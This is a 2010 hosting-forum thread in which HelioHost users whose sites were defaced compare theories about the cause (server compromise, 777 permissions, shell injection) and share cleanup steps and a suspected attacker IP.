NikeJoshua Posted October 26, 2010 Author Share Posted October 26, 2010 djbob, I very sincerely doubt that we were all running the same buggy software, as all that my site contained were own designed php pages. A note of interest is that right before the hack, the entire Heliohost server (including heliohost.org and helionet.org) were down with a Internal server error, and a Cannot connect to server error, which along with the fact that several seeming unrelated accounts were hacked, and that some of the links were non public ones (one of mine isn't shared publicly, pooras was still in maintenance), does lead me to believe the attack was on the server on a whole. For me the sites don't contain any sensitive data, so i really don't mind if this never gets resolved, i can just reupload the correct page each time they change it and be done with it, however, this may not be the case for others, and could seriously hurt the reputation of Heliohost... Link to comment Share on other sites More sharing options...
pooras Posted October 26, 2010 Share Posted October 26, 2010 djbob, you asked about what we were using? I was using WordPress 3.0.1 (It's the latest version), and that means I was using php like other hacked sites. as NikeJoshua said and I saido before too, It seems the attack was on whole Server and not on a site for a specific reason. I didn't tell anybody about my site and as i told u, it was still in maintenance and at the very begining so there were not any special thing on my site to give the hackers a reason to attack! I deleted my whole files on server, so i can not tell u to check my files, but i don't know if they logged in in my cPanel or not. I wih you could have find out that how they attacked, did they used an exploit on WP or PHP or what? Link to comment Share on other sites More sharing options...
Ashoat Posted October 26, 2010 Share Posted October 26, 2010 If the site was on the whole server then I think we'd be in more trouble than we are. HelioHost and HelioNet are still okay. My new theory: the attack targeted anybody whose "chmod" permissions were set incorrectly. Using CGI scripts you can easily access files anywhere on the hard drive, and if they have permissions to play around with them (ie. you set them to 777) then they can delete stuff. Same goes for a directory with 777 - files can be created in it. alteisen: the files you have there were chown'd by root. I deleted them. They were symlinked to the system's zone files, which is sort of useless considering that information is publicly broadcasted over our nameservers... Link to comment Share on other sites More sharing options...
Pancake Posted October 27, 2010 Share Posted October 27, 2010 Looks like my site was hacked, too: http://windswept.heliohost.org/ Should I try to fix this now, or let you take a look and see what they did first? I don't have anything installed on the site, it's all my own stuff. And I don't -think- I set anything to 777. Might've been some problems with html not being properly escaped, though. I figured since it was just a test site and all of 5 people knew about it, it wouldn't be a problem, so I kinda hadn't gotten around to fixing that yet. >.> *Edit to add. And for some reason I can't access google, or yahoo, or forumcircle, and a whole bunch of sites right now. But I can access a few sites (like this one), so my internet isn't broken. Could this possibly be related, or is it just a coincidence? That was fine just a couple hours ago. I'm on Ubuntu Linux. Link to comment Share on other sites More sharing options...
Wizard Posted October 27, 2010 Share Posted October 27, 2010 Looks like my site was hacked, too: http://windswept.heliohost.org/ Should I try to fix this now, or let you take a look and see what they did first? I don't have anything installed on the site, it's all my own stuff. And I don't -think- I set anything to 777. Might've been some problems with html not being properly escaped, though. I figured since it was just a test site and all of 5 people knew about it, it wouldn't be a problem, so I kinda hadn't gotten around to fixing that yet. >.> *Edit to add. And for some reason I can't access google, or yahoo, or forumcircle, and a whole bunch of sites right now. But I can access a few sites (like this one), so my internet isn't broken. Could this possibly be related, or is it just a coincidence? That was fine just a couple hours ago. I'm on Ubuntu Linux. Try OpenDNS to fix your internet. Link to comment Share on other sites More sharing options...
Pancake Posted October 27, 2010 Share Posted October 27, 2010 Thanks, that worked. I was worried for a bit that those Iranian guys had done more than just mess up my website. Good to know it was just my ISP's nameservers screwing up and my computer's ok. Hm... Looks like they screwed up the index.cgi page and added an index.html page. *Deletes them* I -think- everything else has been left alone. Link to comment Share on other sites More sharing options...
NikeJoshua Posted October 27, 2010 Author Share Posted October 27, 2010 djbob, The chmod theory is wrong as well: All files are set: -rw-r--r-- (644) Directories: drwxr-xr-x (755) Also, it seems they have some sort of script running that periodically keeps reuploading their versions of index.php after i replace it with mine. In any event, my site is REALLY basic, it is just 2 small php files (one 9k, the other 19k). Perhaps it could help if you would check those for vulnerabilities? For this i'll give you whatever permission you may need to access my files in any way you see fit. If you prefer i email you the php source files or something, let me know. I think this would be the quickest way to either point out the security flaw, or show that the cause would be server related (It would definitely be easier than going over all the server files...) Link to comment Share on other sites More sharing options...
xiella Posted October 27, 2010 Share Posted October 27, 2010 Mine got hacked too. I was using some recent version of Drupal (really just an experiment site, so I don't remember which version). I hadn't logged in for days/weeks/months/don't remember, so I highly doubt they'd intercepted a session. Sounds like they would be targetting heliohost.org? I did set an image folder to 777. really not sure about cgi scripting so can't comment. Link to comment Share on other sites More sharing options...
cl58 Posted October 28, 2010 Share Posted October 28, 2010 I was just hacked as well. I attached a screenshot of what they do to the site as I have deleted all traces of the hacking from my site. FTP worked fine for me. Link to comment Share on other sites More sharing options...
mikeInside Posted October 28, 2010 Share Posted October 28, 2010 I set up my account a week or two ago. It was totally fresh, apart from a single index.html file containing the text "hello world." No php stuff. Chmod is 644. It was hacked, I deleted it, it was hacked again yesterday. Hopefully the vulnerability won't be too difficult to track down. Link to comment Share on other sites More sharing options...
alteisenriese Posted October 28, 2010 Share Posted October 28, 2010 Guys, I suggest you to check your latest visitor stats, maybe you will find out which part of your php programs thats vulnerable to shell injection, my site has been injected so many times and from the latest visitor stats i can see where the script is injected then i put that visitor IP into the ban list. Link to comment Share on other sites More sharing options...
Bad Wolf Posted October 28, 2010 Share Posted October 28, 2010 Link to comment Share on other sites More sharing options...
Byron Posted October 28, 2010 Share Posted October 28, 2010 Guys, I suggest you to check your latest visitor stats, maybe you will find out which part of your php programs thats vulnerable to shell injection, my site has been injected so many times and from the latest visitor stats i can see where the script is injected then i put that visitor IP into the ban list. What IP did you end up banning? Link to comment Share on other sites More sharing options...
alteisenriese Posted October 28, 2010 Share Posted October 28, 2010 Guys, I suggest you to check your latest visitor stats, maybe you will find out which part of your php programs thats vulnerable to shell injection, my site has been injected so many times and from the latest visitor stats i can see where the script is injected then i put that visitor IP into the ban list. What IP did you end up banning? The latest one is 41.102.66.14 i forgot the rest because i cant access my cpanel at the moment. Link to comment Share on other sites More sharing options...
Byron Posted October 28, 2010 Share Posted October 28, 2010 The latest one is 41.102.66.14 i forgot the rest because i cant access my cpanel at the moment. OK thanks. How about posting the others as soon as your able to access your cpanel. Link to comment Share on other sites More sharing options...
Recommended Posts